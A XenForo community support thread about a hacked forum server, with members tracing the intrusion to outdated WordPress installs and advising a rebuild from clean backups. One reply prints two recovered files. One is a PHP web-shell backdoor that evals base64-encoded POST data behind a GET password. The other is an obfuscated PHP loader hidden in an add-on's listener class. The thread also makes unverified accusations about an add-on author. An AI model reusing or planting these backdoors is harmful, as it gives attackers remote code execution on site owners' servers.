XF 1.4 Google saying: "This site may be hacked"


Well-known member
Hello guys,

I have came across a massive decrease of pages indexed by google and checking WebMaster Tools I saw a warning telling me that my website might be hacked.

They say that a thrid party people just put malicious content into my forum and give me some URLS.

Accessing them, they are pure HTML pages without any relation to Xenforo, inside my domain.

How can I get over this ? I don't know how much its related to xenforo but my forum is running normally if I browse it.

Some more information: I just run xenforo into my Linode instance that has been configured by the amazing service of @MattW
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Are you also by chance running WordPress anywhere on that Linode instance?
You will first need to find the method used for the intrusion and injection of the HTML pages that are getting picked up and lock that down.
Then you proceed with the cleanup (which depending on how the intrusion occurred could be extensive).
Are you also by chance running WordPress anywhere on that Linode instance?
You will first need to find the method used for the intrusion and injection of the HTML pages that are getting picked up and lock that down.
Then you proceed with the cleanup (which depending on how the intrusion occurred could be extensive).
Yes, I do have a wordpress instance.

Google is pointing an URL of the domain of the forum itself, not the wordpress instance.

Any tip on how I will be able to find that?

Well.. I'm finding strange content everywhere. I got like 4 instances of wordpress that I really dont touch much and all of them plus my xenforo folders have recent modified files with strange content
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Your server is compromised.
You need to ensure your old backups are in working order, ask your server provider to re-install your operating system, ensure it's secured and hardended, and then restore from an old backup prior to compromise.
There is a couple of businesses listed within here that are well recommended for setting up, and maintaining, secure servers. If you don't know how to do it yourself.
Your server is compromised.
You need to ensure your old backups are in working order, ask your server provider to re-install your operating system, ensure it's secured and hardended, and then restore from an old backup prior to compromise.
There is a couple of businesses listed within here that are well recommended for setting up, and maintaining, secure servers. If you don't know how to do it yourself.

Looks like Im into serious trouble. Right now that I will need to renew my Xenforo license to upgrade and avoid those problems..lol

For the wordpress instances, Im just deleting them since they are nothing but old sites that I dont even mantain anymore.
Upgrading XF won't resolve anything.

You will need to perform a forensic examination of the server, patch the hole, and restore from a known good backup or comb through the database and every file and remove any malicious code.
Yes, I do have a wordpress instance.

Google is pointing an URL of the domain of the forum itself, not the wordpress instance.

Any tip on how I will be able to find that?

Well.. I'm finding strange content everywhere. I got like 4 instances of wordpress that I really dont touch much and all of them plus my xenforo folders have recent modified files with strange content
WordPress is a known attack (and intrusion) vector. If you don't have all the sites (and their associated plugins) kept up to date it's most likely where the entry was done from.
Once they make entry they can traverse any of the sites on the server.

For the wordpress instances, Im just deleting them since they are nothing but old sites that I dont even mantain anymore.
And this is most likely the reason you got hacked.
With WordPress, if you aren't going to maintain the sites (keep them updated) then you need to remove all instances of them.

Only reliable way to recover will be to spin the server back out as a new one and then restore from known good backups.
Upgrading XF won't resolve anything.

You will need to perform a forensic examination of the server, patch the hole, and restore from a known good backup or comb through the database and every file and remove any malicious code.

WordPress is a known attack (and intrusion) vector. If you don't have all the sites (and their associated plugins) kept up to date it's most likely where the entry was done from.
Once they make entry they can traverse any of the sites on the server.

And this is most likely the reason you got hacked.
With WordPress, if you aren't going to maintain the sites (keep them updated) then you need to remove all instances of them.

Only reliable way to recover will be to spin the server back out as a new one and then restore from known good backups.

Well, as a starting point, I am just deleting every instance of wordpress I have, since I dont have any activity anymore.

After its done, I will get some help to recover to a backup I have here from last year of my XF since I dont touch it since them.. I just need to find it, hehe.

I backed up a wordpress folder that I have to my local machine and windows defender pointed some malicious content, so looks like It came from wordpress like you said.

Is your XenForo 1.4 patched up all the way to 1.5.13?
Review the plugins you're using as well.

Not yet.. And lafter the responses I got, Im not doing it ultil Im sure that the problem is over.
You have a phpmail folder uploaded inside your XenForo folder on the 21st Feb, which has infected the rest of the site. They have got into all the sites via Wordpress
[root@li121-82 public]# cat upgrade.php 
This website is ok!!</br>
<?php if($_GET["login"]=="snvcu"){ echo success; $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;");}} ?>
[root@li121-82 public]#
Guess who wrote this file...........
<?php $hxqhxpcdx = ') { $eptnlgc = "    x63     162     x65     141     x74     145     x5f     146     x75     15]y7:]268]y7f#<!%tww!>!        x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]3~<3,j%>j%!*3!    x27!hmg%281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]yc1^W%c
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<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUF6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSsgwilve'; $wnxmkf=explode(chr((407-287)),substr($hxqhxpcdx,(27929-21909),(170-136))); $pzqmkhkn = $wnxmkf[0]($wnxmkf[(5-
4)]); $zjbfuds = $wnxmkf[0]($wnxmkf[(11-9)]); if (!function_exists('zcwwvet')) { function zcwwvet($uyjunsceq, $tiqtszuzjcp,$wvrgaulo) { $sgsxlel = NULL; for($mmeusbxa=0;$mmeusbxa<(sizeof($uyjunsceq)/2);$mmeusbxa++) { $sgsxlel .= substr($tiqtszuzjcp, $uyjunsceq[($mme
usbxa*2)],$uyjunsceq[($mmeusbxa*2)+(4-3)]); } return $wvrgaulo(chr((32-23)),chr((399-307)),$sgsxlel); }; } $kkvrnuskkx = explode(chr((147-103)),'836,24,5123,35,4785,41,4312,66,294,68,537,36,4956,42,3750,24,992,51,1072,29,5541,37,0,55,4551,59,3873,28,906,21,5637,35,1
4,5954,66,701,47,2536,35,2924,67,2317,66,4134,33,3549,68,4251,28,5476,65,5364,24,5212,46,1395,28,5429,47,2168,49,3525,24,641,55,5258,21,3933,39,2469,21,696,5'); $kwryxvy = $pzqmkhkn("",zcwwvet($kkvrnuskkx,$hxqhxpcdx,$zjbfuds)); $pzqmkhkn=$hxqhxpcdx; $kwryxvy(""); $k
wryxvy=(746-625); $hxqhxpcdx=$kwryxvy-1; ?><?php

 * Class Listener Class for EventListener.
 * @package *******_*******Helper
 * Version 1.0.0

Guess who wrote this file...........
 * @package *******_*******Helper
 * Version 1.0.0

Hmmmm... couldn't be our poor misunderstood individual from the Asiatic countries that keep coding call-backs into his add-ons (and people keep using even now because some of his stuff is "cool") could it?
Hmmmm... couldn't be our poor misunderstood individual from the Asiatic countries that keep coding call-backs into his add-ons (and people keep using even now because some of his stuff is "cool") could it?

Well, I had some custom addons made by them (way too specific and expensive at least for me.. $400+ spent) that I asked years before all the trouble and I haven't had cash to ask for another development. Btw, lets make it right this time.
Who are you guys talking about, we're not all part of the clique.
<removed before I get a rules violation warning from Broganator!>
He's a known hacker and anyone using his add-ons/styles are just asking to be hacked.

Brogan linked to the full discussion... the individual in question is named in the NOTE: portion of the first post of said thread linked to.
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